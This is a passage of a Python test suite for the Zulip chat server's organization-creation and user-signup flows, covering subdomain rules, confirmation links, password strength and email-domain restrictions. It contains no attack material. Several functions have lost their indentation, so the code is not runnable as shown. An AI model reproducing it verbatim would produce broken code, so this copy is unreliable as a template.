    self.assertTrue(result["Location"].startswith('http://zuliptest.testserver/accounts/login/subdomain/'))

    # Make sure the realm is created
    realm = get_realm(string_id)
    self.assertEqual(realm.string_id, string_id)
    user = get_user(email, realm)
    self.assertEqual(user.realm, realm)

    # Check that user is the owner.
    self.assertEqual(user.role, UserProfile.ROLE_REALM_OWNER)

    # Check defaults
    self.assertEqual(realm.org_type, Realm.CORPORATE)
    self.assertEqual(realm.emails_restricted_to_domains, False)
    self.assertEqual(realm.invite_required, True)

    # Check welcome messages
    for stream_name, text, message_count in [
            (Realm.DEFAULT_NOTIFICATION_STREAM_NAME, 'with the topic', 3),
            (Realm.INITIAL_PRIVATE_STREAM_NAME, 'private stream', 1)]:
        stream = get_stream(stream_name, realm)
        recipient = stream.recipient
        messages = Message.objects.filter(recipient=recipient).order_by('date_sent')
        self.assertEqual(len(messages), message_count)
        self.assertIn(text, messages[0].content)

    # Check signup messages
    recipient = signups_stream.recipient
    messages = Message.objects.filter(recipient=recipient).order_by('id')
    self.assertEqual(len(messages), 2)
    self.assertIn('Signups enabled', messages[0].content)
    self.assertIn('signed up', messages[1].content)
    self.assertEqual('zuliptest', messages[1].topic_name())

    # Piggyback a little check for how we handle
    # empty string_ids.
    realm.string_id = ''
    self.assertEqual(realm.display_subdomain, '.')
def test_create_realm_non_existing_email(self) -> None:
    # Realm creation works for an email with no existing account.
    self.check_able_to_create_realm("user1@test.com")
def test_create_realm_existing_email(self) -> None:
    # Realm creation also works for an email that already has an
    # account in another realm (hamlet exists in 'zulip').
    self.check_able_to_create_realm("hamlet@zulip.com")
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',))
def test_create_realm_ldap_email(self) -> None:
    # Realm creation with an LDAP-backed email/password, using the
    # LDAP 'mail' attribute as the email source.
    self.init_default_ldap_database()

    with self.settings(LDAP_EMAIL_ATTR="mail"):
        self.check_able_to_create_realm("newuser_email@zulip.com",
                                        self.ldap_password("newuser_with_email"))
def test_create_realm_as_system_bot(self) -> None:
    """A reserved system-bot address cannot be used to create a realm."""
    response = self.client_post('/new/', {'email': 'notification-bot@zulip.com'})
    self.assertEqual(response.status_code, 200)
    self.assert_in_response('notification-bot@zulip.com is reserved for system bots', response)
def test_create_realm_no_creation_key(self) -> None:
    """
    Trying to create a realm without a creation_key should fail when
    OPEN_REALM_CREATION is false.
    """
    email = "user1@test.com"

    with self.settings(OPEN_REALM_CREATION=False):
        # Create new realm with the email, but no creation key.
        result = self.client_post('/new/', {'email': email})
        self.assertEqual(result.status_code, 200)
        self.assert_in_response('New organization creation disabled', result)
@override_settings(OPEN_REALM_CREATION=True)
def test_create_realm_with_subdomain(self) -> None:
    """Creating a realm with an explicit subdomain and realm name should
    redirect into the new subdomain and persist both values.
    """
    password = "test"
    string_id = "zuliptest"
    email = "user1@test.com"
    realm_name = "Test"

    # Make sure the realm does not exist
    with self.assertRaises(Realm.DoesNotExist):
        get_realm(string_id)

    # Create new realm with the email
    result = self.client_post('/new/', {'email': email})
    self.assertEqual(result.status_code, 302)
    self.assertTrue(result["Location"].endswith(
        f"/accounts/new/send_confirm/{email}"))
    result = self.client_get(result["Location"])
    self.assert_in_response("Check your email so we can get started.", result)

    # Visit the confirmation link.
    confirmation_url = self.get_confirmation_url_from_outbox(email)
    result = self.client_get(confirmation_url)
    self.assertEqual(result.status_code, 200)

    result = self.submit_reg_form_for_user(email, password,
                                           realm_subdomain = string_id,
                                           realm_name=realm_name,
                                           # Pass HTTP_HOST for the target subdomain
                                           HTTP_HOST=string_id + ".testserver")
    self.assertEqual(result.status_code, 302)

    result = self.client_get(result.url, subdomain=string_id)
    self.assertEqual(result.status_code, 302)
    self.assertEqual(result.url, 'http://zuliptest.testserver')

    # Make sure the realm is created
    realm = get_realm(string_id)
    self.assertEqual(realm.string_id, string_id)
    self.assertEqual(get_user(email, realm).realm, realm)

    self.assertEqual(realm.name, realm_name)
    self.assertEqual(realm.subdomain, string_id)
@override_settings(OPEN_REALM_CREATION=True, FREE_TRIAL_DAYS=30)
def test_create_realm_during_free_trial(self) -> None:
    """With FREE_TRIAL_DAYS set, finishing realm creation should land on
    the billing upgrade page (?onboarding=true) instead of the realm root.
    """
    password = "test"
    string_id = "zuliptest"
    email = "user1@test.com"
    realm_name = "Test"

    with self.assertRaises(Realm.DoesNotExist):
        get_realm(string_id)

    result = self.client_post('/new/', {'email': email})
    self.assertEqual(result.status_code, 302)
    self.assertTrue(result["Location"].endswith(
        f"/accounts/new/send_confirm/{email}"))
    result = self.client_get(result["Location"])
    self.assert_in_response("Check your email so we can get started.", result)

    confirmation_url = self.get_confirmation_url_from_outbox(email)
    result = self.client_get(confirmation_url)
    self.assertEqual(result.status_code, 200)

    result = self.submit_reg_form_for_user(email, password,
                                           realm_subdomain = string_id,
                                           realm_name=realm_name,
                                           HTTP_HOST=string_id + ".testserver")
    self.assertEqual(result.status_code, 302)

    result = self.client_get(result.url, subdomain=string_id)
    self.assertEqual(result.url, 'http://zuliptest.testserver/upgrade/?onboarding=true')

    result = self.client_get(result.url, subdomain=string_id)
    self.assert_in_success_response(["Not ready to start your trial?"], result)

    realm = get_realm(string_id)
    self.assertEqual(realm.string_id, string_id)
    self.assertEqual(get_user(email, realm).realm, realm)
    self.assertEqual(realm.name, realm_name)
    self.assertEqual(realm.subdomain, string_id)
@override_settings(OPEN_REALM_CREATION=True)
def test_mailinator_signup(self) -> None:
result = self.client_post('/new/', {'email': "hi@mailinator.com"})
self.assert_in_response('Please use your real email address.', result)
    @override_settings(OPEN_REALM_CREATION=True)
    def test_subdomain_restrictions(self) -> None:
        """Malformed or reserved subdomains are rejected with specific error
        messages, while a well-formed one succeeds."""
        password = "test"
        email = "user1@test.com"
        realm_name = "Test"

        result = self.client_post('/new/', {'email': email})
        self.client_get(result["Location"])
        confirmation_url = self.get_confirmation_url_from_outbox(email)
        self.client_get(confirmation_url)

        # Map of bad subdomain -> substring expected in the error message.
        errors = {'id': "length 3 or greater",
                  '-id': "cannot start or end with a",
                  'string-ID': "lowercase letters",
                  'string_id': "lowercase letters",
                  'stream': "unavailable",
                  'streams': "unavailable",
                  'about': "unavailable",
                  'abouts': "unavailable",
                  'zephyr': "unavailable"}
        for string_id, error_msg in errors.items():
            result = self.submit_reg_form_for_user(email, password,
                                                   realm_subdomain = string_id,
                                                   realm_name = realm_name)
            self.assert_in_response(error_msg, result)

        # test valid subdomain
        result = self.submit_reg_form_for_user(email, password,
                                               realm_subdomain = 'a-0',
                                               realm_name = realm_name)
        self.assertEqual(result.status_code, 302)
        self.assertTrue(result.url.startswith('http://a-0.testserver/accounts/login/subdomain/'))
    @override_settings(OPEN_REALM_CREATION=True)
    def test_subdomain_restrictions_root_domain(self) -> None:
        """Creating a realm on the empty (root) subdomain is blocked when
        ROOT_DOMAIN_LANDING_PAGE is enabled, and allowed otherwise."""
        password = "test"
        email = "user1@test.com"
        realm_name = "Test"

        result = self.client_post('/new/', {'email': email})
        self.client_get(result["Location"])
        confirmation_url = self.get_confirmation_url_from_outbox(email)
        self.client_get(confirmation_url)

        # test root domain will fail with ROOT_DOMAIN_LANDING_PAGE
        with self.settings(ROOT_DOMAIN_LANDING_PAGE=True):
            result = self.submit_reg_form_for_user(email, password,
                                                   realm_subdomain = '',
                                                   realm_name = realm_name)
            self.assert_in_response('unavailable', result)

        # test valid use of root domain
        result = self.submit_reg_form_for_user(email, password,
                                               realm_subdomain = '',
                                               realm_name = realm_name)
        self.assertEqual(result.status_code, 302)
        self.assertTrue(result.url.startswith('http://testserver/accounts/login/subdomain/'))
    @override_settings(OPEN_REALM_CREATION=True)
    def test_subdomain_restrictions_root_domain_option(self) -> None:
        """The realm_in_root_domain form option follows the same root-domain
        rules: blocked under ROOT_DOMAIN_LANDING_PAGE, allowed otherwise."""
        password = "test"
        email = "user1@test.com"
        realm_name = "Test"

        result = self.client_post('/new/', {'email': email})
        self.client_get(result["Location"])
        confirmation_url = self.get_confirmation_url_from_outbox(email)
        self.client_get(confirmation_url)

        # test root domain will fail with ROOT_DOMAIN_LANDING_PAGE
        with self.settings(ROOT_DOMAIN_LANDING_PAGE=True):
            result = self.submit_reg_form_for_user(email, password,
                                                   realm_subdomain = 'abcdef',
                                                   realm_in_root_domain = 'true',
                                                   realm_name = realm_name)
            self.assert_in_response('unavailable', result)

        # test valid use of root domain
        result = self.submit_reg_form_for_user(email, password,
                                               realm_subdomain = 'abcdef',
                                               realm_in_root_domain = 'true',
                                               realm_name = realm_name)
        self.assertEqual(result.status_code, 302)
        self.assertTrue(result.url.startswith('http://testserver/accounts/login/subdomain/'))
    def test_is_root_domain_available(self) -> None:
        """is_root_domain_available() is False when the root domain hosts a
        landing page or when an existing realm claims the root subdomain."""
        self.assertTrue(is_root_domain_available())
        with self.settings(ROOT_DOMAIN_LANDING_PAGE=True):
            self.assertFalse(is_root_domain_available())
        # Claim the root subdomain with an existing realm.
        realm = get_realm("zulip")
        realm.string_id = Realm.SUBDOMAIN_FOR_ROOT_DOMAIN
        realm.save()
        self.assertFalse(is_root_domain_available())
    def test_subdomain_check_api(self) -> None:
        """The JSON subdomain-availability endpoint reports taken, malformed,
        and available subdomains with the expected messages."""
        result = self.client_get("/json/realm/subdomain/zulip")
        self.assert_in_success_response(["Subdomain unavailable. Please choose a different one."], result)

        result = self.client_get("/json/realm/subdomain/zu_lip")
        self.assert_in_success_response(["Subdomain can only have lowercase letters, numbers, and \'-\'s."], result)

        result = self.client_get("/json/realm/subdomain/hufflepuff")
        self.assert_in_success_response(["available"], result)
        self.assert_not_in_success_response(["unavailable"], result)
def test_subdomain_check_management_command(self) -> None:
# Short names should work
check_subdomain_available('aa', from_management_command=True)
# So should reserved ones
check_subdomain_available('zulip', from_management_command=True)
# malformed names should still not
with self.assertRaises(ValidationError):
check_subdomain_available('-ba_d-', from_management_command=True)
class UserSignUpTest(InviteUserBase):
    def _assert_redirected_to(self, result: HttpResponse, url: str) -> None:
        """Assert that ``result`` is a 302 redirect pointing exactly at ``url``."""
        self.assertEqual(result.status_code, 302)
        self.assertEqual(result['LOCATION'], url)
    def test_bad_email_configuration_for_accounts_home(self) -> None:
        """
        Make sure we redirect for SMTP errors.
        """
        email = self.nonreg_email('newguy')

        # Simulate a broken outgoing-email configuration.
        smtp_mock = patch(
            'zerver.views.registration.send_confirm_registration_email',
            side_effect=smtplib.SMTPException('uh oh'),
        )
        error_mock = patch('logging.error')
        with smtp_mock, error_mock as err:
            result = self.client_post('/accounts/home/', {'email': email})

        self._assert_redirected_to(result, '/config-error/smtp')
        # The SMTP failure is logged with the view name and exception text.
        self.assertEqual(
            err.call_args_list[0][0],
            ('Error in accounts_home: %s', 'uh oh'),
        )
    def test_bad_email_configuration_for_create_realm(self) -> None:
        """
        Make sure we redirect for SMTP errors.
        """
        email = self.nonreg_email('newguy')

        # Simulate a broken outgoing-email configuration.
        smtp_mock = patch(
            'zerver.views.registration.send_confirm_registration_email',
            side_effect=smtplib.SMTPException('uh oh'),
        )
        error_mock = patch('logging.error')
        with smtp_mock, error_mock as err:
            result = self.client_post('/new/', {'email': email})

        self._assert_redirected_to(result, '/config-error/smtp')
        # The SMTP failure is logged with the view name and exception text.
        self.assertEqual(
            err.call_args_list[0][0],
            ('Error in create_realm: %s', 'uh oh'),
        )
    def test_user_default_language_and_timezone(self) -> None:
        """
        Check if the default language of new user is the default language
        of the realm.
        """
        email = self.nonreg_email('newguy')
        password = "newpassword"
        timezone = "US/Mountain"
        realm = get_realm('zulip')
        do_set_realm_property(realm, 'default_language', "de")

        result = self.client_post('/accounts/home/', {'email': email})
        self.assertEqual(result.status_code, 302)
        self.assertTrue(result["Location"].endswith(
            f"/accounts/send_confirm/{email}"))
        result = self.client_get(result["Location"])
        self.assert_in_response("Check your email so we can get started.", result)

        # Visit the confirmation link.
        confirmation_url = self.get_confirmation_url_from_outbox(email)
        result = self.client_get(confirmation_url)
        self.assertEqual(result.status_code, 200)

        # Pick a password and agree to the ToS.
        result = self.submit_reg_form_for_user(email, password, timezone=timezone)
        self.assertEqual(result.status_code, 302)

        # The new user inherits the realm default language but keeps the
        # timezone submitted on the registration form.
        user_profile = self.nonreg_user('newguy')
        self.assertEqual(user_profile.default_language, realm.default_language)
        self.assertEqual(user_profile.timezone, timezone)
        from django.core.mail import outbox
        # NOTE(review): presumably pops the signup email so later outbox
        # inspections don't see it — verify against sibling tests.
        outbox.pop()
    def test_default_twenty_four_hour_time(self) -> None:
        """
        Check if the default twenty_four_hour_time setting of new user
        is the default twenty_four_hour_time of the realm.
        """
        email = self.nonreg_email('newguy')
        password = "newpassword"
        realm = get_realm('zulip')
        do_set_realm_property(realm, 'default_twenty_four_hour_time', True)

        result = self.client_post('/accounts/home/', {'email': email})
        self.assertEqual(result.status_code, 302)
        self.assertTrue(result["Location"].endswith(
            f"/accounts/send_confirm/{email}"))
        result = self.client_get(result["Location"])
        self.assert_in_response("Check your email so we can get started.", result)

        # Visit the confirmation link.
        confirmation_url = self.get_confirmation_url_from_outbox(email)
        result = self.client_get(confirmation_url)
        self.assertEqual(result.status_code, 200)

        result = self.submit_reg_form_for_user(email, password)
        self.assertEqual(result.status_code, 302)

        # The new account picks up the realm-level default.
        user_profile = self.nonreg_user('newguy')
        self.assertEqual(user_profile.twenty_four_hour_time, realm.default_twenty_four_hour_time)
    def test_signup_already_active(self) -> None:
        """
        Check if signing up with an active email redirects to a login page.
        """
        email = self.example_email("hamlet")
        result = self.client_post('/accounts/home/', {'email': email})
        self.assertEqual(result.status_code, 302)
        self.assertIn('login', result['Location'])
        result = self.client_get(result.url)
        self.assert_in_response("You've already registered", result)
    def test_signup_system_bot(self) -> None:
        """Signing up with a system bot's address redirects to login with an
        already-registered message."""
        email = "notification-bot@zulip.com"
        result = self.client_post('/accounts/home/', {'email': email}, subdomain="lear")
        self.assertEqual(result.status_code, 302)
        self.assertIn('login', result['Location'])
        result = self.client_get(result.url)

        # This is not really the right error message, but at least it's an error.
        self.assert_in_response("You've already registered", result)
    def test_signup_existing_email(self) -> None:
        """
        Check if signing up with an email used in another realm succeeds.
        """
        email = self.example_email('hamlet')
        password = "newpassword"
        realm = get_realm('lear')

        result = self.client_post('/accounts/home/', {'email': email}, subdomain="lear")
        self.assertEqual(result.status_code, 302)
        result = self.client_get(result["Location"], subdomain="lear")

        confirmation_url = self.get_confirmation_url_from_outbox(email)
        result = self.client_get(confirmation_url, subdomain="lear")
        self.assertEqual(result.status_code, 200)

        result = self.submit_reg_form_for_user(email, password, subdomain="lear")
        self.assertEqual(result.status_code, 302)

        # The same address now backs one account in each realm.
        get_user(email, realm)
        self.assertEqual(UserProfile.objects.filter(delivery_email=email).count(), 2)
    def test_signup_invalid_name(self) -> None:
        """
        Check if an invalid name during signup is handled properly.
        """
        email = "newguy@zulip.com"
        password = "newpassword"

        result = self.client_post('/accounts/home/', {'email': email})
        self.assertEqual(result.status_code, 302)
        self.assertTrue(result["Location"].endswith(
            f"/accounts/send_confirm/{email}"))
        result = self.client_get(result["Location"])
        self.assert_in_response("Check your email so we can get started.", result)

        # Visit the confirmation link.
        confirmation_url = self.get_confirmation_url_from_outbox(email)
        result = self.client_get(confirmation_url)
        self.assertEqual(result.status_code, 200)

        # Pick a password and agree to the ToS.
        result = self.submit_reg_form_for_user(email, password, full_name="<invalid>")
        self.assert_in_success_response(["Invalid characters in name!"], result)

        # Verify that the user is asked for name and password
        self.assert_in_success_response(['id_password', 'id_full_name'], result)
    def test_signup_without_password(self) -> None:
        """
        Check if signing up without a password works properly when
        password_auth_enabled is False.
        """
        email = self.nonreg_email('newuser')

        result = self.client_post('/accounts/home/', {'email': email})
        self.assertEqual(result.status_code, 302)
        self.assertTrue(result["Location"].endswith(
            f"/accounts/send_confirm/{email}"))
        result = self.client_get(result["Location"])
        self.assert_in_response("Check your email so we can get started.", result)

        # Visit the confirmation link.
        confirmation_url = self.get_confirmation_url_from_outbox(email)
        result = self.client_get(confirmation_url)
        self.assertEqual(result.status_code, 200)

        # With password auth disabled, registration succeeds with no
        # password field submitted at all.
        with patch('zerver.views.registration.password_auth_enabled', return_value=False):
            result = self.client_post(
                '/accounts/register/',
                {'full_name': 'New User',
                 'key': find_key_by_email(email),
                 'terms': True})

        # User should now be logged in.
        self.assertEqual(result.status_code, 302)
        user_profile = self.nonreg_user('newuser')
        self.assert_logged_in_user_id(user_profile.id)
    def test_signup_without_full_name(self) -> None:
        """
        Check if signing up without a full name redirects to a registration
        form.
        """
        email = "newguy@zulip.com"
        password = "newpassword"

        result = self.client_post('/accounts/home/', {'email': email})
        self.assertEqual(result.status_code, 302)
        self.assertTrue(result["Location"].endswith(
            f"/accounts/send_confirm/{email}"))
        result = self.client_get(result["Location"])
        self.assert_in_response("Check your email so we can get started.", result)

        # Visit the confirmation link.
        confirmation_url = self.get_confirmation_url_from_outbox(email)
        result = self.client_get(confirmation_url)
        self.assertEqual(result.status_code, 200)

        # Post from_confirmation without a full_name; the final form is shown.
        result = self.client_post(
            '/accounts/register/',
            {'password': password,
             'key': find_key_by_email(email),
             'terms': True,
             'from_confirmation': '1'})
        self.assert_in_success_response(["We just need you to do one last thing."], result)

        # Verify that the user is asked for name and password
        self.assert_in_success_response(['id_password', 'id_full_name'], result)
    def test_signup_with_full_name(self) -> None:
        """
        Check that signing up with a full name already supplied still lands
        on the final confirmation form.
        """
        email = "newguy@zulip.com"
        password = "newpassword"

        result = self.client_post('/accounts/home/', {'email': email})
        self.assertEqual(result.status_code, 302)
        self.assertTrue(result["Location"].endswith(
            f"/accounts/send_confirm/{email}"))
        result = self.client_get(result["Location"])
        self.assert_in_response("Check your email so we can get started.", result)

        # Visit the confirmation link.
        confirmation_url = self.get_confirmation_url_from_outbox(email)
        result = self.client_get(confirmation_url)
        self.assertEqual(result.status_code, 200)

        result = self.client_post(
            '/accounts/register/',
            {'password': password,
             'key': find_key_by_email(email),
             'terms': True,
             'full_name': "New Guy",
             'from_confirmation': '1'})
        self.assert_in_success_response(["We just need you to do one last thing."], result)
    def test_signup_with_weak_password(self) -> None:
        """
        Check that a password failing the configured strength requirements
        is rejected and no account is created.
        """
        email = "newguy@zulip.com"

        result = self.client_post('/accounts/home/', {'email': email})
        self.assertEqual(result.status_code, 302)
        self.assertTrue(result["Location"].endswith(
            f"/accounts/send_confirm/{email}"))
        result = self.client_get(result["Location"])
        self.assert_in_response("Check your email so we can get started.", result)

        # Visit the confirmation link.
        confirmation_url = self.get_confirmation_url_from_outbox(email)
        result = self.client_get(confirmation_url)
        self.assertEqual(result.status_code, 200)

        with self.settings(PASSWORD_MIN_LENGTH=6, PASSWORD_MIN_GUESSES=1000):
            # from_confirmation=1 only shows the form; the weak password
            # is not validated until the final submission below.
            result = self.client_post(
                '/accounts/register/',
                {'password': 'easy',
                 'key': find_key_by_email(email),
                 'terms': True,
                 'full_name': "New Guy",
                 'from_confirmation': '1'})
            self.assert_in_success_response(["We just need you to do one last thing."], result)

            result = self.submit_reg_form_for_user(email,
                                                   'easy',
                                                   full_name="New Guy")
            self.assert_in_success_response(["The password is too weak."], result)

            with self.assertRaises(UserProfile.DoesNotExist):
                # Account wasn't created.
                get_user(email, get_realm("zulip"))
    def test_signup_with_default_stream_group(self) -> None:
        # Check if user is subscribed to the streams of default
        # stream group as well as default streams.
        email = self.nonreg_email('newguy')
        password = "newpassword"
        realm = get_realm("zulip")

        result = self.client_post('/accounts/home/', {'email': email})
        self.assertEqual(result.status_code, 302)
        result = self.client_get(result["Location"])
        confirmation_url = self.get_confirmation_url_from_outbox(email)
        result = self.client_get(confirmation_url)
        self.assertEqual(result.status_code, 200)

        # Set up two plain default streams plus one default stream group.
        default_streams = []
        for stream_name in ["venice", "verona"]:
            stream = get_stream(stream_name, realm)
            do_add_default_stream(stream)
            default_streams.append(stream)

        group1_streams = []
        for stream_name in ["scotland", "denmark"]:
            stream = get_stream(stream_name, realm)
            group1_streams.append(stream)
        do_create_default_stream_group(realm, "group 1", "group 1 description", group1_streams)

        result = self.submit_reg_form_for_user(email, password, default_stream_groups=["group 1"])
        self.check_user_subscribed_only_to_streams("newguy", default_streams + group1_streams)
    def test_signup_two_confirmation_links(self) -> None:
        """Requesting signup twice yields two confirmation links; completing
        registration via the second invalidates the first."""
        email = self.nonreg_email('newguy')
        password = "newpassword"

        result = self.client_post('/accounts/home/', {'email': email})
        self.assertEqual(result.status_code, 302)
        result = self.client_get(result["Location"])
        first_confirmation_url = self.get_confirmation_url_from_outbox(email)
        first_confirmation_key = find_key_by_email(email)

        result = self.client_post('/accounts/home/', {'email': email})
        self.assertEqual(result.status_code, 302)
        result = self.client_get(result["Location"])
        second_confirmation_url = self.get_confirmation_url_from_outbox(email)

        # Sanity check:
        self.assertNotEqual(first_confirmation_url, second_confirmation_url)

        # Register the account (this will use the second confirmation url):
        result = self.submit_reg_form_for_user(email, password, full_name="New Guy",
                                               from_confirmation="1")
        self.assert_in_success_response(["We just need you to do one last thing.",
                                         "New Guy",
                                         email],
                                        result)
        result = self.submit_reg_form_for_user(email,
                                               password,
                                               full_name="New Guy")
        user_profile = UserProfile.objects.get(delivery_email=email)
        self.assertEqual(user_profile.delivery_email, email)

        # Now try to register using the first confirmation url:
        result = self.client_get(first_confirmation_url)
        self.assertEqual(result.status_code, 200)
        result = self.client_post(
            '/accounts/register/',
            {'password': password,
             'key': first_confirmation_key,
             'terms': True,
             'full_name': "New Guy",
             'from_confirmation': '1'})
        # Error page should be displayed
        self.assert_in_success_response(["The registration link has expired or is not valid."], result)
        self.assertEqual(result.status_code, 200)
    def test_signup_with_multiple_default_stream_groups(self) -> None:
        # Check if user is subscribed to the streams of default
        # stream groups as well as default streams.
        email = self.nonreg_email('newguy')
        password = "newpassword"
        realm = get_realm("zulip")

        result = self.client_post('/accounts/home/', {'email': email})
        self.assertEqual(result.status_code, 302)
        result = self.client_get(result["Location"])
        confirmation_url = self.get_confirmation_url_from_outbox(email)
        result = self.client_get(confirmation_url)
        self.assertEqual(result.status_code, 200)

        default_streams = []
        for stream_name in ["venice", "verona"]:
            stream = get_stream(stream_name, realm)
            do_add_default_stream(stream)
            default_streams.append(stream)

        group1_streams = []
        for stream_name in ["scotland", "denmark"]:
            stream = get_stream(stream_name, realm)
            group1_streams.append(stream)
        do_create_default_stream_group(realm, "group 1", "group 1 description", group1_streams)

        # "scotland" appears in both groups; deduplicated via set() below.
        group2_streams = []
        for stream_name in ["scotland", "rome"]:
            stream = get_stream(stream_name, realm)
            group2_streams.append(stream)
        do_create_default_stream_group(realm, "group 2", "group 2 description", group2_streams)

        result = self.submit_reg_form_for_user(email, password,
                                               default_stream_groups=["group 1", "group 2"])
        self.check_user_subscribed_only_to_streams(
            "newguy", list(set(default_streams + group1_streams + group2_streams)))
    def test_signup_without_user_settings_from_another_realm(self) -> None:
        """When the user declines to import settings, the new account gets
        stock defaults rather than Hamlet's customized Zulip-realm settings."""
        hamlet_in_zulip = self.example_user('hamlet')
        email = hamlet_in_zulip.delivery_email
        password = "newpassword"
        subdomain = "lear"
        realm = get_realm("lear")

        # Make an account in the Zulip realm, but we're not copying from there.
        hamlet_in_zulip.left_side_userlist = True
        hamlet_in_zulip.default_language = "de"
        hamlet_in_zulip.emojiset = "twitter"
        hamlet_in_zulip.high_contrast_mode = True
        hamlet_in_zulip.enter_sends = True
        hamlet_in_zulip.tutorial_status = UserProfile.TUTORIAL_FINISHED
        hamlet_in_zulip.save()

        result = self.client_post('/accounts/home/', {'email': email}, subdomain=subdomain)
        self.assertEqual(result.status_code, 302)
        result = self.client_get(result["Location"], subdomain=subdomain)
        confirmation_url = self.get_confirmation_url_from_outbox(email)
        result = self.client_get(confirmation_url, subdomain=subdomain)
        self.assertEqual(result.status_code, 200)
        # NOTE(review): source_realm="on" appears to mean "no source realm
        # selected" in this form — confirm against the registration form.
        result = self.submit_reg_form_for_user(email, password, source_realm="on",
                                               HTTP_HOST=subdomain + ".testserver")

        # The Lear-realm account has default settings, not Hamlet's.
        hamlet = get_user(self.example_email("hamlet"), realm)
        self.assertEqual(hamlet.left_side_userlist, False)
        self.assertEqual(hamlet.default_language, "en")
        self.assertEqual(hamlet.emojiset, "google-blob")
        self.assertEqual(hamlet.high_contrast_mode, False)
        self.assertEqual(hamlet.enable_stream_audible_notifications, False)
        self.assertEqual(hamlet.enter_sends, False)
        self.assertEqual(hamlet.tutorial_status, UserProfile.TUTORIAL_WAITING)
def test_signup_with_user_settings_from_another_realm(self) -> None:
hamlet_in_zulip = self.example_user('hamlet')
email = hamlet_in_zulip.delivery_email
password = "newpassword"
subdomain = "lear"
lear_realm = get_realm("lear")
self.login('hamlet')
with get_test_image_file('img.png') as image_file:
self.client_post("/json/users/me/avatar", {'file': image_file})
hamlet_in_zulip.refresh_from_db()
hamlet_in_zulip.left_side_userlist = True
hamlet_in_zulip.default_language = "de"
hamlet_in_zulip.emojiset = "twitter"
hamlet_in_zulip.high_contrast_mode = True
hamlet_in_zulip.enter_sends = True
hamlet_in_zulip.tutorial_status = UserProfile.TUTORIAL_FINISHED
hamlet_in_zulip.save()
result = self.client_post('/accounts/home/', {'email': email}, subdomain=subdomain)
self.assertEqual(result.status_code, 302)
result = self.client_get(result["Location"], subdomain=subdomain)
confirmation_url = self.get_confirmation_url_from_outbox(email)
result = self.client_get(confirmation_url, subdomain=subdomain)
self.assertEqual(result.status_code, 200)
result = self.client_post(
'/accounts/register/',
{'password': password,
'key': find_key_by_email(email),
'from_confirmation': '1'},
subdomain=subdomain)
self.assert_in_success_response(["Import settings from existing Zulip account",
"selected >\n Zulip Dev",
"We just need you to do one last thing."], result)
result = self.submit_reg_form_for_user(email, password, source_realm="zulip",
HTTP_HOST=subdomain + ".testserver")
hamlet_in_lear = get_user(email, lear_realm)
self.assertEqual(hamlet_in_lear.left_side_userlist, True)
self.assertEqual(hamlet_in_lear.default_language, "de")
self.assertEqual(hamlet_in_lear.emojiset, "twitter")
self.assertEqual(hamlet_in_lear.high_contrast_mode, True)
self.assertEqual(hamlet_in_lear.enter_sends, True)
self.assertEqual(hamlet_in_lear.enable_stream_audible_notifications, False)
self.assertEqual(hamlet_in_lear.tutorial_status, UserProfile.TUTORIAL_FINISHED)
zulip_path_id = avatar_disk_path(hamlet_in_zulip)
lear_path_id = avatar_disk_path(hamlet_in_lear)
zulip_avatar_bits = open(zulip_path_id, 'rb').read()
lear_avatar_bits = open(lear_path_id, 'rb').read()
self.assertTrue(len(zulip_avatar_bits) > 500)
self.assertEqual(zulip_avatar_bits, lear_avatar_bits)
    def test_signup_invalid_subdomain(self) -> None:
        """
        Check if attempting to authenticate to the wrong subdomain logs an
        error and redirects.
        """
        email = "newuser@zulip.com"
        password = "newpassword"

        result = self.client_post('/accounts/home/', {'email': email})
        self.assertEqual(result.status_code, 302)
        self.assertTrue(result["Location"].endswith(
            f"/accounts/send_confirm/{email}"))
        result = self.client_get(result["Location"])
        self.assert_in_response("Check your email so we can get started.", result)

        # Visit the confirmation link.
        confirmation_url = self.get_confirmation_url_from_outbox(email)
        result = self.client_get(confirmation_url)
        self.assertEqual(result.status_code, 200)

        # Fake an authenticate() that reports an invalid-subdomain failure
        # through return_data.
        def invalid_subdomain(**kwargs: Any) -> Any:
            return_data = kwargs.get('return_data', {})
            return_data['invalid_subdomain'] = True

        with patch('zerver.views.registration.authenticate', side_effect=invalid_subdomain):
            with patch('logging.error') as mock_error:
                result = self.client_post(
                    '/accounts/register/',
                    {'password': password,
                     'full_name': 'New User',
                     'key': find_key_by_email(email),
                     'terms': True})
                mock_error.assert_called_once()
        self.assertEqual(result.status_code, 302)
    def test_replace_subdomain_in_confirmation_link(self) -> None:
        """
        Check that manually changing the subdomain in a registration
        confirmation link doesn't allow you to register to a different realm.
        """
        email = "newuser@zulip.com"
        self.client_post('/accounts/home/', {'email': email})
        # Submit the key issued for the "zulip" realm against "zephyr".
        result = self.client_post(
            '/accounts/register/',
            {'password': "password",
             'key': find_key_by_email(email),
             'terms': True,
             'full_name': "New User",
             'from_confirmation': '1'}, subdomain="zephyr")
        self.assert_in_success_response(["We couldn't find your confirmation link"], result)
def test_failed_signup_due_to_restricted_domain(self) -> None:
realm = get_realm('zulip')
do_set_realm_property(realm, 'invite_required', False)
do_set_realm_property(realm, 'emails_restricted_to_domains', True)
email = 'user@acme.com'
form = HomepageForm({'email': email}, realm=realm)
self.assertIn(f"Your email address, {email}, is not in one of the domains",
form.errors['email'][0])
def test_failed_signup_due_to_disposable_email(self) -> None:
realm = get_realm('zulip')
realm.emails_restricted_to_domains = False
realm.disallow_disposable_email_addresses = True
realm.save()
email = 'abc@mailnator.com'
form = HomepageForm({'email': email}, realm=realm)
self.assertIn("Please use your real email address", form.errors['email'][0])
def test_failed_signup_due_to_email_containing_plus(self) -> None:
realm = get_realm('zulip')
realm.emails_restricted_to_domains = True
realm.save()
email = 'iago+label@zulip.com'
form = HomepageForm({'email': email}, realm=realm)
self.assertIn("Email addresses containing + are not allowed in this organization.", form.errors['email'][0])
def test_failed_signup_due_to_invite_required(self) -> None:
realm = get_realm('zulip')
realm.invite_required = True
realm.save()
email = 'user@zulip.com'
form = HomepageForm({'email': email}, realm=realm)
self.assertIn(f"Please request an invite for {email} from",
form.errors['email'][0])
def test_failed_signup_due_to_nonexistent_realm(self) -> None:
email = 'user@acme.com'
form = HomepageForm({'email': email}, realm=None)
self.assertIn("organization you are trying to join using {} does "
"not exist".format(email), form.errors['email'][0])
def test_access_signup_page_in_root_domain_without_realm(self) -> None:
result = self.client_get('/register', subdomain="", follow=True)
self.assert_in_success_response(["Find your Zulip accounts"], result)
    @override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',
                                                'zproject.backends.ZulipDummyBackend'))
